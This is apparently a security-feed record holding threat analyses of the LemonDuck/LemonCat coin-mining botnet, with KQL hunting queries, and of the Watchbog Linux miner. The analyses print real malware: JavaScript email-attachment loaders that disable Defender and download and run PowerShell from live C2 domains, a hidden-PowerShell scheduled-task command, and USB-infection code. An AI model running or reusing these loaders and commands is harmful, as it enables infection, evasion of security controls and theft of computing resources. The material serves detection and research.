Looks for instances of the callback actions that attempt to obfuscate detection while downloading supporting scripts, such as those that enable the “Killer” and “Infection” functions of the malware, the mining components, and potential secondary functions. More specific variants are included to account for environments with potential false positives. The most general version is intended to account for minor script or component changes, such as switching to non-.bin files and uncommon components. [Run query in Microsoft 365 security center.](<https://security.microsoft.com/hunting?query=H4sIAAAAAAAEAN2QzWrCUBCFz1roO1xctSC60p2rVlEQ8Q0kJrYJJlGS-Ac-vN8dA9rgwm3LMHcm58zPmXxprYMShcSFCm0tK7ER-Fq5KvI3tXSR01ExWIE7TeES2ESBvbl-GhPGoCn5nIrMenyV07va2lF3tFmlzUyxLvGEt9XBQ3qiB-zjqYpXdHySZ1gAF2lmNb43Bim15PXbvaoePQ4uhNuSVcw513oiU5xTvwdNNaxxr7LfqEmJAV-RaQpq9qZjR3_Fjoltj-0yB1Pw-gv__j2e62pluu7X_Z_bNsy83-eRRN8NJNPg1z-4At8RQUloAwAA&runQuery=true&timeRangeId=week>)

```kusto
DeviceProcessEvents
| where InitiatingProcessFileName in ("powershell.exe","cmd.exe")
| where InitiatingProcessCommandLine has_all("/c echo try","down_url=","md5","downloaddata","ComputeHash") or
InitiatingProcessCommandLine has_all("/c echo try","down_url=","md5","downloaddata","ComputeHash",".bin") or
InitiatingProcessCommandLine has_all("/c echo try","down_url=","md5","downloaddata","ComputeHash","kr.bin","if.bin","m6.bin")
```

**LemonDuck named scheduled task creation**

Looks for instances where LemonDuck creates its statically named scheduled tasks, or for the semi-unique creation pattern LemonDuck also uses: a randomly named task that launches a hidden PowerShell process. An example of a randomly generated one is `"schtasks.exe" /create /ru system /sc MINUTE /mo 60 /tn fs5yDs9ArkV\2IVLzNXfZV /F /tr "powershell -w hidden -c PS_CMD"`, where `PS_CMD` stands for the PowerShell command being scheduled; the second branch of the query therefore matches on the switch set and the `powershell -w hidden -c` prefix rather than on the placeholder. [Run query in Microsoft 365 security center.](<https://security.microsoft.com/hunting?query=H4sIAAAAAAAEAKWS0WrCQBBF77PgPyx5UrD6BX3S-mRLwQ8o2ygoGpXdtGlB_PaenSQlFV-kLLO53Jmde3eyM631qa1yvq8KOhqKrCf4tQ4qwX31dJZTpQ1cIJzmnNqDXuRVGPOoC3tGfU5dCR-1I8Zkv4jsZp-_qlNwwfIor7RA42BVG-s2oMeE2nTSo5B6Dv_d9c3476Z7CXZ6526e8zuQB-_Jja7yH-bAX2WCTcybM4duYE8O73WUNG_dt9YKqNc44jxarvjNpj_Q4gKlrsMWzztsaPCJ2spmGG2WyYPTA1xytsXpyt5E4nKb8hKvUz1rZvf9AWK9PVhOAgAA&runQuery=true&timeRangeId=week>)

```kusto
DeviceProcessEvents
| where FileName =~ "schtasks.exe"
| where ProcessCommandLine has("/create")
| where ProcessCommandLine has_any("/tn blackball","/tn blutea","/tn rtsa") or
ProcessCommandLine has_all("/create","/ru","system","/sc","/mo","/tn","/F","/tr","powershell -w hidden -c")
```

**Competition killer script scheduled task execution**

Looks for instances of the LemonDuck component KR.Bin, which is intended to kill competition before the installation and persistence of the malware are made concrete. The killer script is based on historical versions from 2018 and earlier, which have grown over time to include scheduled task and service names of various botnets, malware, and other competing services. The version currently in use by LemonDuck has approximately 40-60 scheduled task names. The upper bound in this query can be modified, and the query adjusted to include time bounding.
[Run query in Microsoft 365 security center.](<https://security.microsoft.com/hunting?query=H4sIAAAAAAAEAJWRT0_CQBDF35nE79D0BAkRDhw4oBeqCQbUxD_XBguxhlpMW8EaP7y_HQppiATMZmZnZt_MvLwNNNdKb4q475VpaVHOuaI-V6qC-EwN_cjTWjG1DPP20EPid86UjpnGTEwNFVPJFeITTlM-WUS1sPoCOwf3hflqYx0FxAlW1GqPut3F1_jWjlGuz2pvxs5v2-myBVHIq5vTPIlri84XlfigpskIxHaX41mYJrMKteX5zMTEmLj9F5jjk-FLWCTW8woyhsuGU3gip7-U_8-E-g-ksHE_MOHOyTeKPtDnuJZVfme8I2Pt6YZ4hXl60gdzp7V_WaKyf4DjYXUuTZ-euqbSMS0Hhu6D_gUG3Q8GqgIAAA&runQuery=true&timeRangeId=week>)

```kusto
DeviceProcessEvents
| where ProcessCommandLine has_all("schtasks.exe","/Delete","/TN","/F")
| summarize make_set(ProcessCommandLine) by DeviceId
| extend DeleteVolume = array_length(set_ProcessCommandLine)
| where set_ProcessCommandLine has_any("Mysa","Sorry","Oracle Java Update","ok") and DeleteVolume >= 40 and DeleteVolume <= 80
```

**LemonDuck hosts file adjustment for dynamic C2 downloads**

Looks for a PowerShell event in which LemonDuck attempts to retrieve the IP address of a C2 and, in the same command, modify the hosts file with the retrieved address. The address is bound to a name that does not exist and is randomly generated. The script then instructs the machine to download data from that name. This query has a more general and a more specific version, allowing the detection of this technique if other activity groups were to utilize it. [Run query in Microsoft 365 security center.](<https://security.microsoft.com/hunting?query=H4sIAAAAAAAEAMWQuwrCYAyFzyz4DqWTgvgGDmK9gYigu5S22IK20op18OH9Erro4OAiIZc_OTknbaRMdxVKyDvVqrxqsDn9TKVu1H319FSgVjm9Gg-0ZlYwLRR7LHX6YFjQPVNvQVx8Z4IFCnUF1TpT44xnbEx-4OGPajPqCxYzS7VxjG3mdBodiaYygH9J_6YV-IY8BZ26irFYDDXCDZN0dd5hbTaE0y6s2PnHXWv432cHNvZs1J3-9_vtHfn_L9Gt0E952_Wxf90Lt1_r6hICAAA&runQuery=true&timeRangeId=week>)

```kusto
DeviceProcessEvents
| where InitiatingProcessFileName == "powershell.exe"
| where InitiatingProcessCommandLine has_all("GetHostAddresses","etc","hosts")
or InitiatingProcessCommandLine has_all("GetHostAddresses","IPAddressToString","etc","hosts","DownloadData")
```

[Learn how your organization can stop attacks through automated, cross-domain security and built-in AI with Microsoft Defender 365](<https://www.microsoft.com/en-us/microsoft-365/security/microsoft-365-defender>).

The post [When coin miners evolve, Part 2: Hunting down LemonDuck and LemonCat attacks](<https://www.microsoft.com/security/blog/2021/07/29/when-coin-miners-evolve-part-2-hunting-down-lemonduck-and-lemoncat-attacks/>) appeared first on [Microsoft Security Blog](<https://www.microsoft.com/security/blog>).
{"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0144", "CVE-2017-8464", "CVE-2019-0708", "CVE-2020-0796", "CVE-2021-26855", "CVE-2021-26858", "CVE-2021-27065"], "modified": "2021-07-29T19:00:59", "id": "MSSECURE:4A6B394DCAF12E05136AE087248E228C", "href": "https://www.microsoft.com/security/blog/2021/07/29/when-coin-miners-evolve-part-2-hunting-down-lemonduck-and-lemoncat-attacks/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-07-30T00:08:30", "description": "_[Note: In this two-part blog series, we expose a modern malware infrastructure and provide guidance for protecting against the wide range of threats it enables. Part 1 covers the evolution of the threat, how it spreads, and how it impacts organizations. [Part 2](<https://www.microsoft.com/security/blog/2021/07/29/when-coin-miners-evolve-part-2-hunting-down-lemonduck-and-lemoncat-attacks/>) is a deep dive on the attacker behavior and will provide investigation guidance.] _\n\nCombating and preventing today's threats to enterprises require comprehensive protection focused on addressing the full scope and impact of attacks. Anything that can gain access to machines\u2014even so-called commodity malware\u2014can bring in more dangerous threats. We\u2019ve seen this in banking Trojans serving as entry point for ransomware and hands-on-keyboard attacks. LemonDuck, an actively updated and robust malware that\u2019s primarily known for its botnet and cryptocurrency mining objectives, followed the same trajectory when it adopted more sophisticated behavior and escalated its operations. 
Today, beyond using resources for its traditional bot and mining activities, LemonDuck steals credentials, removes security controls, spreads via emails, moves laterally, and ultimately drops more tools for human-operated activity.\n\nLemonDuck\u2019s threat to enterprises is also in the fact that it\u2019s a cross-platform threat. It\u2019s one of a few documented bot malware families that targets Linux systems as well as Windows devices. It uses a wide range of spreading mechanisms\u2014phishing emails, exploits, USB devices, brute force, among others\u2014and it has shown that it can quickly take advantage of news, events, or the release of new exploits to run effective campaigns. For example, in 2020, it was observed using COVID-19-themed lures in email attacks. In 2021, it exploited newly patched [Exchange Server vulnerabilities](<https://www.microsoft.com/security/blog/2021/03/25/analyzing-attacks-taking-advantage-of-the-exchange-server-vulnerabilities/>) to gain access to outdated systems.\n\nThis threat, however, does not just limit itself to new or popular vulnerabilities. It continues to use older vulnerabilities, which benefit the attackers at times when focus shifts to patching a popular vulnerability rather than investigating compromise. Notably, LemonDuck removes other attackers from a compromised device by getting rid of competing malware and preventing any new infections by patching the same vulnerabilities it used to gain access.\n\nIn the early years, LemonDuck targeted China heavily, but its operations have since expanded to include many other countries, focusing on the manufacturing and IoT sectors. Today, LemonDuck impacts a very large geographic range, with the United States, Russia, China, Germany, the United Kingdom, India, Korea, Canada, France, and Vietnam seeing the most encounters.\n\n\n\n_Figure 1. 
Global distribution of LemonDuck botnet activity_\n\nIn 2021, LemonDuck campaigns started using more diversified command and control (C2) infrastructure and tools. This update supported the marked increase in hands-on-keyboard actions post-breach, which varied depending on the perceived value of compromised devices to the attackers. Despite all these upgrades, however, LemonDuck still utilizes C2s, functions, script structures, and variable names for far longer than the average malware. This is likely due to its use of bulletproof hosting providers such as Epik Holdings, which are unlikely to take any part of the LemonDuck infrastructure offline even when reported for malicious actions, allowing LemonDuck to persist and continue to be a threat.\n\nIn-depth research into malware infrastructures of various sizes and operations provides invaluable insight into the breadth of threats that organizations face today. In the case of LemonDuck, the threat is cross-platform, persistent, and constantly evolving. Research like this emphasizes the importance of having comprehensive visibility into the wide range of threats, as well as the ability to correlate simple, disparate activity such as coin mining to more dangerous adversarial attacks.\n\n## LemonDuck and LemonCat infrastructure\n\nThe earliest documentation of LemonDuck was from its cryptocurrency campaigns in May 2019. These campaigns included PowerShell scripts that employed additional scripts kicked off by a scheduled task. The task was used to bring in the PCASTLE tool to achieve a couple of goals: abuse the EternalBlue SMB exploit, as well as use brute force or pass-the-hash to move laterally and begin the operation again. Many of these behaviors are still observed in LemonDuck campaigns today.\n\nLemonDuck is named after the variable \u201cLemon_Duck\u201d in one of the said PowerShell scripts. The variable is often used as the user agent, in conjunction with assigned numbers, for infected devices. 
The format used two sets of alphabetical characters separated by dashes, for example: \u201cUser-Agent: Lemon-Duck-[A-Z]-[A-Z]\u201d. The term still appears in PowerShell scripts, as well as in many of the execution scripts, specifically in a function called SIEX, which is used to assign a unique user-agent during botnet connection in attacks as recently as June 2021.\n\nLemonDuck frequently utilizes open-source material built off of resources also used by other botnets, so there are many components of this threat that would seem familiar. Microsoft researchers are aware of two distinct operating structures, which both use the LemonDuck malware but are potentially operated by two different entities for separate goals.\n\nThe first, which we call the \u201cDuck\u201d infrastructure, uses historical infrastructures discussed in this report. It is highly consistent in running campaigns and performs limited follow-on activities. This infrastructure is seldom seen in conjunction with edge device compromise as an infection method, and is more likely to have random display names for its C2 sites, and is always observed utilizing \u201cLemon_Duck\u201d explicitly in script.\n\nThe second infrastructure, which we call \u201cCat\u201d infrastructure\u2014for primarily using two domains with the word \u201ccat\u201d in them (_sqlnetcat[.]com_, _netcatkit[.]com_)\u2014emerged in January 2021. It was used in attacks exploiting vulnerabilities in Microsoft Exchange Server. Today, the Cat infrastructure is used in attacks that typically result in backdoor installation, credential and data theft, and malware delivery. 
It is often seen delivering the malware Ramnit.\n\n \n\n**Sample Duck domains** | **Sample Cat domains** \n---|--- \n \n * cdnimages[.]xyz\n * bb3u9[.]com\n * zz3r0[.]com\n * pp6r1[.]com\n * amynx[.]com\n * ackng[.]com\n * hwqloan[.]com\n * js88[.]ag\n * zer9g[.]com\n * b69kq[.]com\n| \n\n * sqlnetcat[.]com\n * netcatkit[.]com\n * down[.]sqlnetcat[.]com\n\n \n \nThe Duck and Cat infrastructures use similar subdomains, and they use the same task names, such as \u201cblackball\u201d. Both infrastructures also utilize the same packaged components hosted on similar or identical sites for their mining, lateral movement, and competition-removal scripts, as well as many of the same function calls.\n\nThe fact that the Cat infrastructure is used for more dangerous campaigns does not deprioritize malware infections from the Duck infrastructure. Instead, this intelligence adds important context for understanding this threat: the same set of tools, access, and methods can be re-used at dynamic intervals, to greater impact. Despite common implications that cryptocurrency miners are less threatening than other malware, their core functionality mirrors non-monetized malware, making any botnet infection worthy of prioritization.\n\n\n\n_Figure 2. LemonDuck attack chain from the Duck and Cat infrastructures_\n\n## Initial access\n\nLemonDuck spreads in a variety of ways, but the two main methods are (1) compromises that are either edge-initiated or facilitated by bot implants moving laterally within an organization, or (2) bot-initiated email campaigns.\n\nLemonDuck acts as a loader for many other follow-on activities, but one of its main functions is to spread by compromising other systems. 
Since its first appearance, the LemonDuck operators have leveraged scans against both Windows and Linux devices for open or weakly authenticated SMB, Exchange, SQL, Hadoop, REDIS, RDP, or other edge devices that might be vulnerable to password spray or application vulnerabilities like CVE-2017-0144 (EternalBlue), CVE-2017-8464 (LNK RCE), CVE-2019-0708 (BlueKeep), CVE-2020-0796 (SMBGhost), CVE-2021-26855 (ProxyLogon), CVE-2021-26857 (ProxyLogon), CVE-2021-26858 (ProxyLogon), and CVE-2021-27065 (ProxyLogon).\n\nOnce inside a system with an Outlook mailbox, as part of its normal exploitation behavior, LemonDuck attempts to run a script that utilizes the credentials present on the device. The script instructs the mailbox to send copies of a phishing message with preset messages and attachments to all contacts.\n\nBecause of this method of contact messaging, security controls that rely on determining if an email is sent from a suspicious sender don\u2019t apply. This means that email security policies that reduce scanning or coverage for internal mail need to be re-evaluated, as sending emails through contact scraping is very effective at bypassing email controls.\n\nFrom mid-2020 to March 2021, LemonDuck\u2019s email subjects and body content have remained static, as have the attachment names and formats. 
These attachment names and formats have changed very little from similar campaigns that occurred in early 2020.\n\n \n\n**Sample email subjects ** | **Sample email body content** \n---|--- \n \n * The Truth of COVID-19\n * COVID-19 nCov Special info WHO\n * HALTH ADVISORY:CORONA VIRUS\n * WTF\n * What the fcuk\n * good bye\n * farewell letter\n * broken file\n * This is your order?\n| \n\n * Virus actually comes from United States of America\n * very important infomation for Covid-19\n * see attached document for your action and discretion.\n * the outbreak of CORONA VIRUS is cause of concern especially where forign personal have recently arrived or will be arriving at various intt in near future.\n * what's wrong with you?are you out of your mind!!!!!\n * are you out of your mind!!!!!what 's wrong with you?\n * good bye, keep in touch\n * can you help me to fix the file,i can't read it\n * file is brokened, i can't open it \n \nThe attachment used for these lures is one of three types: .doc, .js, or a .zip containing a .js file. Whatever the type, the file is named \u201creadme\u201d. Occasionally, all three types are present in the same email.\n\n\n\n_Figure 3. Sample email_\n\nWhile the JavaScript is detected by many security vendors, it might be classified with generic detection names. It could be valuable for organizations to sanitize JavaScript or VBScript executing or calling prompts (such as PowerShell) directly from mail downloads through solutions such as [custom detection rules](<https://docs.microsoft.com/en-us/microsoft-365/security/defender/custom-detection-rules?view=o365-worldwide>).\n\nSince LemonDuck began operating, the .zip to .js file execution method is the most common. The JavaScript has replaced the scheduled task that LemonDuck previously used to kickstart the PowerShell script. This PowerShell script has looked very similar throughout 2020 and 2021, with minor changes depending on the version, indicating continued development. 
Below is a comparison of changes from the most recent iterations of the email-delivered downloads and those from April of 2020.\n\n \n\n**April 2020 PowerShell script** | **March 2021 PowerShell script** \n---|--- \n`var cmd =new ActiveXObject(\"WScript.Shell\");var cmdstr=\"cmd /c start /b notepad \"+WScript.ScriptFullName+\" & powershell -w hidden -c \\\"if([Environment]::OSVersion.version.Major -eq '10'){Set-ItemProperty -Path 'HKCU:\\Environment' -Name 'windir' -Value 'cmd /c powershell -w hidden Set-MpPreference -DisableRealtimeMonitoring 1 & powershell -w hidden IEx(New-Object Net.WebClient).DownLoadString(''http://t.awcna.com/mail.jsp?js*%username%*%computername%''+[Environment]::OSVersion.version.Major) &::';sleep 1;schtasks /run /tn \\\\Microsoft\\\\Windows\\\\DiskCleanup\\\\SilentCleanup /I;Remove-ItemProperty -Path 'HKCU:\\Environment' -Name 'windir' -Force}else{IEx(ne`w-obj`ect Net.WebC`lient).DownloadString('http://t.awcna.com/7p.php');bpu -method migwiz -Payload 'powershell -w hidden IEx(New-Object Net.WebClient).DownLoadString(''http://t.awcna.com/mail.jsp?js*%username%*%computername%''+[Environment]::OSVersion.version.Majo \n//This File is broken.` | `var cmd =new ActiveXObject(\"WScript.Shell\");var cmdstr=\"cmd /c start /b notepad \"+WScript.ScriptFullName+\" & powershell -w hidden IE`x(Ne`w-Obj`ect Net.WebC`lient).DownLoadString('http://t.z'+'z3r0.com/7p.php?0.7*mail_js*%username%*%computername%*'+[Environment]::OSVersion.version.Major);bpu ('http://t.z'+'z3r0.com/mail.jsp?js_0.7')\";cmd.run(cmdstr,0,1); \n//This File is broken.` \n \n \n\nAfter the emails are sent, the inbox is cleaned to remove traces of these mails. This method of self-spreading is attempted on any affected device that has a mailbox, regardless of whether it is an Exchange server.\n\nOther common methods of infection include movement within the compromised environment, as well as through USB and connected drives. 
These processes are often kicked off automatically and have occurred consistently throughout the entirety of LemonDuck\u2019s operation.\n\nThese methods run as a series of C# scripts that gather available drives for infection. They also create a running list of drives that are already infected based on whether it finds the threat already installed. Once checked against the running list of infected drives, these scripts attempt to create a set of hidden files in the home directory, including a copy of _readme.js_. Any device that has been affected by the LemonDuck implants at any time could have had any number of drives attached to it that are compromised in this manner. This makes this behavior a possible entry vector for additional attacks.\n\n`DriveInfo[] drives = DriveInfo.GetDrives(); \nforeach (DriveInfo drive in drives) \n{ \nif (blacklist.Contains(drive.Name)) \n{ continue;} \nConsole.WriteLine(\"Detect drive:\"+drive.Name); \nif (IsSupported(drive)) \n{ \nif (!File.Exists(drive + home + inf_data)) \n{ \nConsole.WriteLine(\"Try to infect \"+drive.Name); \nif (CreateHomeDirectory(drive.Name) && Infect(drive.Name)) \n{ \nblacklist.Add(drive.Name); \n} \n} \nelse { \nConsole.WriteLine(drive.Name+\" already infected!\"); \nblacklist.Add(drive.Name); \n} \n} \nelse{ \nblacklist.Add(drive.Name);`\n\n## Comprehensive protection against a wide-ranging malware operation\n\nThe cross-domain visibility and coordinated defense delivered by [Microsoft 365 Defender](<https://www.microsoft.com/en-us/microsoft-365/security/microsoft-365-defender>) is designed for the wide range and increasing sophistication of threats that LemonDuck exemplifies. Microsoft 365 Defender has AI-powered industry-leading protections that can stop multi-component threats like LemonDuck across domains and across platforms. Microsoft 365 Defender for Office 365 detects the malicious emails sent by the LemonDuck botnet to deliver malware payloads as well as spread the bot loader. 
Microsoft Defender for Endpoint detects and blocks LemonDuck implants, payloads, and malicious activity on Linux and Windows.\n\nMore importantly, Microsoft 365 Defender provides rich investigation tools that can expose detections of LemonDuck activity, including attempts to compromise and gain a foothold on the network, so security operations teams can efficiently and confidently respond to and resolve these attacks. Microsoft 365 Defender correlates cross-platform, cross-domain signals to paint the end-to-end attack chain, allowing organizations to see the full impact of an attack. We also published a threat analytics article on this threat. Microsoft 365 Defender customers can use this report to get important technical details, guidance for investigation, consolidated incidents, and steps to mitigate this threat in particular and modern cyberattacks in general.\n\nIn Part 2 of this blog series, we share our in-depth technical analysis of the malicious actions that follow a LemonDuck infection. These include general, automatic behavior as well as human-initiated behavior. We will also provide guidance for investigating LemonDuck attacks, as well as mitigation recommendations for strengthening defenses against these attacks. 
**READ: [When coin miners evolve, Part 2: Hunting down LemonDuck and LemonCat attacks](<https://www.microsoft.com/security/blog/2021/07/29/when-coin-miners-evolve-part-2-hunting-down-lemonduck-and-lemoncat-attacks/>).**\n\n \n\n_Microsoft 365 Defender Threat Intelligence Team_\n\nThe post [When coin miners evolve, Part 1: Exposing LemonDuck and LemonCat, modern mining malware infrastructure](<https://www.microsoft.com/security/blog/2021/07/22/when-coin-miners-evolve-part-1-exposing-lemonduck-and-lemoncat-modern-mining-malware-infrastructure/>) appeared first on [Microsoft Security Blog](<https://www.microsoft.com/security/blog>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-07-22T16:00:57", "type": "mssecure", "title": "When coin miners evolve, Part 1: Exposing LemonDuck and LemonCat, modern mining malware infrastructure", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0144", "CVE-2017-8464", "CVE-2019-0708", "CVE-2020-0796", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065"], "modified": "2021-07-22T16:00:57", "id": 
"MSSECURE:E537BA51663A720821A67D2A4F7F7F0E", "href": "https://www.microsoft.com/security/blog/2021/07/22/when-coin-miners-evolve-part-1-exposing-lemonduck-and-lemoncat-modern-mining-malware-infrastructure/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "talosblog": [{"lastseen": "2019-09-11T16:31:25", "bulletinFamily": "blog", "cvelist": ["CVE-2018-1000861"], "description": "[](<https://1.bp.blogspot.com/-T6tAdLkCVaQ/XWY957W13BI/AAAAAAAABSk/k4c65smKUDc6_ojm0cR3sGDMB3jvU1LagCLcBGAs/s1600/image5.png>)\n\n_By [Luke DuCharme](<https://twitter.com/_nTr0py>) and [Paul Lee](<https://twitter.com/paulleeio>)._\n\n \n\n\n## What Happened?\n\n \nCisco Incident Response (CSIRS) recently responded to an incident involving the Watchbog [cryptomining](<https://blog.talosintelligence.com/2018/01/malicious-xmr-mining.html>) botnet. The attackers were able to exploit [CVE-2018-1000861](<https://jenkins.io/security/advisory/2018-12-05/>) to gain a foothold and install the [Watchbog](<https://www.bleepingcomputer.com/news/security/bluekeep-scanner-discovered-in-watchbog-cryptomining-malware/>) malware on the affected systems. \n \nThis Linux-based malware relied heavily on Pastebin for command and control (C2) and operated openly. CSIRS gained an accurate understanding of the attacker's intentions and abilities on a customer's network by analyzing the various Pastebins. As the investigation progressed, CSIRS identified and de-obfuscated multiple pastes using artifacts left on compromised hosts. \n \nThere were some attempts at obfuscation, such as base64 encoding URLs and Pastebins, but the attack was still relatively simple to uncover - this attacker did not practice particularly strong operational security. \n \nThe attackers behind Watchbog claimed to be providing a service by identifying security vulnerabilities and aiding the organization by exploiting said weaknesses before any \"real\" hackers could do so. 
During the investigation, Cisco IR found signs of hosts becoming a part of a separate botnet around the time of the Watchbog activity. This raises serious doubts about the \"positive\" intentions of this adversary. Below is a message left on a compromised system by the adversary: \n \n \n\n\n[](<https://1.bp.blogspot.com/-ujTm3bnl6Y4/XXkIAdu_6hI/AAAAAAAACks/aoCA1ZLep9wEg5GhKjKVvWZ1K1xeMaqeQCLcBGAsYHQ/s1600/image5.png>)\n\n \n \n\n\n## What does Watchbog do? \n\n \nThe Watchbog botnet mines Monero cryptocurrency for its owners. While researching our variant we came across a [post](<https://www.alibabacloud.com/blog/return-of-watchbog-exploiting-jenkins-cve-2018-1000861_594798>) by Alibaba Cloud Security that provides some insights into Watchbog. This post coincided with our findings as we found an installation script that performs the following activities. \n \nFirst the installation script checks for running processes matching other cryptocurrency miners. If the system was previously configured to mine cryptocurrency, the installation script would terminate their execution using the kill command: \n \n\n\n[](<https://1.bp.blogspot.com/-A77Z058CSas/XXkIGxjwNUI/AAAAAAAACkw/LU4PzjqWeuUFTzi0ie-5HiUI9aqAvbX0gCLcBGAsYHQ/s1600/image19.png>)\n\n \n \n \nThe script then uses the touch command to determine its capability to write to various directories on the filesystem. \n \n\n\n[](<https://1.bp.blogspot.com/-hZreiq7fNuc/XXkIML9U97I/AAAAAAAACk0/3sYIcbzDfqwKO7yulMTA8cCO0AztQ9y2QCLcBGAsYHQ/s1600/image10.png>)\n\n \n \n \nIt also checks the architecture of the system to determine if it is executing on a 32-bit or 64-bit operating system and then makes three attempts to download and install a '[kerberods](<https://www.securityweek.com/jenkins-vulnerability-exploited-deliver-kerberods-malware>)' dropper using wget or curl. 
\n \n\n\n[](<https://1.bp.blogspot.com/-HPsroOq2qhA/XXkIQfB4zkI/AAAAAAAACk4/rsX2J_AT4QMKum9HYVpGSZllcOgdnJiDgCLcBGAsYHQ/s1600/image6.png>)\n\n \n \nDepending on permissions, the kerberods dropper is saved to one of the following directories: \n \n\n\n * The current working directory\n * /usr/bin\n * /usr/libexec\n * /usr/local/bin\n * /tmp\n * /usr/sbin\n \n \nThe script also retrieves the contents of a Pastebin URL containing a Monero wallet ID and mining information. CSIRS verified this as the same wallet ID as the one used by the attacker referenced in the Alibaba cloud post referenced earlier. \n \n\n\n[](<https://1.bp.blogspot.com/-h-5OOiEvD6E/XXkIVOCPzDI/AAAAAAAACk8/w64pGCY_Lu8_uETE9TIwJPdcz0U1BeqBACLcBGAsYHQ/s1600/image15.png>)\n\n \n \nThough the Pastebin URL in the previous screenshot is no longer accessible, the next step in the infection process is to download the cryptocurrency miner. We identified a script that 'kerberods' likely runs to reach out to GitHub to install the [XMR-Stak](<https://github.com/fireice-uk/xmr-stak>) Monero miner. \n \nThe main part of the script checks to see if a process called 'watchbog' is running. \n \n\n\n[](<https://1.bp.blogspot.com/-VwVkn4qRI_o/XXkIaqorPsI/AAAAAAAAClA/k_fDNgqtyPcLigl06zAGz_G7r8BqDgW2wCLcBGAsYHQ/s1600/image14.png>)\n\n \n \nIf the 'watchbog' process is not detected, the 'testa' or 'download' functions are called to install the version of the miner that's compatible with the host operating system and architecture and execute it to begin the mining process. \n \n\n\n[](<https://1.bp.blogspot.com/-by3LDE47GAs/XXkIfunS68I/AAAAAAAAClI/VPfDareDVrU8sqDw3zCfPrePM6I4GqaRwCLcBGAsYHQ/s1600/image16.png>)\n\n \n \n\n\n### 'Testa' function\n\n \nAs previously mentioned, the 'testa' function may be called to facilitate the infection process. Below is the code associated with this function. This code is responsible for writing the various configuration data used by the mining software. 
The function declares three variables and assigns base64 encoded data to each of them. \n \n\n\n[](<https://1.bp.blogspot.com/-TiGg3jydpBE/XXkIl9UjzpI/AAAAAAAAClU/UlvIXZKQwNscT8a8rOTwe9jtw54KI046wCLcBGAsYHQ/s1600/image18.png>)\n\n \n \nThe base64 encoded data is then decoded and written to various files. \n \n\n\n[](<https://1.bp.blogspot.com/-0T8gl-_prkE/XXkIqsy8W3I/AAAAAAAAClc/jxingEGh9NMTPJCXXZ5gQfhlQ9zOUZzbACLcBGAsYHQ/s1600/image17.png>)\n\n \n \nThe base64 encoded values correspond to the following: \n \n\n\n * St_64: This variable contains the URL of the GitHub repository that hosts the XMR-Stak mining client.\n * hXXps://github[.]com/fireice-uk/xmr-stak/releases/download/2.10.3/xmr-stak-linux-2.10.3-cpu.tar.xz \n \n \n\n\n * con_url: This variable contains the Pastebin URL that is used to host the configuration file for the mining client. \n * hXXps://pastebin[.]com/raw/YJH8sWr\n \n \n\n\n * Cpu_url: This variable contains an additional Pastebin URL. During our investigation the Pastebin URL was no longer accessible, but likely contains an additional configuration file to be used by the mining client.\n * hXXps://pastebin[.]com/raw/irzk5mSh\n \n \n\n\n * poo_url: This variable contains an additional Pastebin URL. During our investigation the Pastebin URL was no longer accessible, but likely contains an additional configuration file to be used by the mining client.\n * hXXps://pastebin[.]com/raw/aJkbTx6Y\n \n \nThe script then starts the Watchbog process and deletes the text file after downloading the encoded Pastebins as a text file and giving it execution permissions. The following screenshot shows the configuration file that is referenced by the con_url variable in the 'testa' function. 
\n \n\n\n[](<https://1.bp.blogspot.com/-xSeuN5oL4aY/XXkIxPOeUEI/AAAAAAAAClk/N635X8ceQ0IdzDY7GJTclbF4rBLEwDYvQCLcBGAsYHQ/s1600/image12.png>)\n\n \n \n\n\n### 'download' function\n\n \nThe following code is associated with the 'download' function referenced by the installation script previously described. Similar to what was described in the 'testa' function, it contains three declared variables with base64 encoded assignments. \n \n\n\n[](<https://1.bp.blogspot.com/-aqSmprNOZXk/XXkI2aAmTJI/AAAAAAAAClo/vtEn5t-UvDUoeNnUn4OPSW9fh8iooJYPwCLcBGAsYHQ/s1600/image13.png>)\n\n \n \nThese base64 encoded strings correspond to the following: \n \n\n\n * mi_64: This variable contains the GitHub URL that hosts the XMRig Monero mining client. \n * hXXps://github[.]com/xmrig/xmrig/releases/download/v2.14.1/xmrig-2.14.1-xenial-x64.tar.gz\n \n \n\n\n * mi_32: This variable contains a Pixeldrain URL. During our investigation the URL was no longer accessible. \n * hXXps://pixeldrain[.]com/api/file/ZuVWceWG\n \n \n\n\n * der_ke: This variable contains a Pastebin URL. The URL was used to host a file containing the attacker's Monero Wallet ID for the miner to use. This Wallet ID is used to facilitate payment to the attacker. All Monero successfully mined by clients under the attacker's control will be transferred to the Wallet ID specified in this file. The same wallet is included in the Alibaba Cloud post mentioned earlier.\n * hXXps://pastebin[.]com/raw/hURdMBLd\n \n \nThe download function then writes the contents retrieved from the specified URLs to various file locations. It then determines the architecture of the system, installs the appropriate mining client, and executes it to initiate the mining process. 
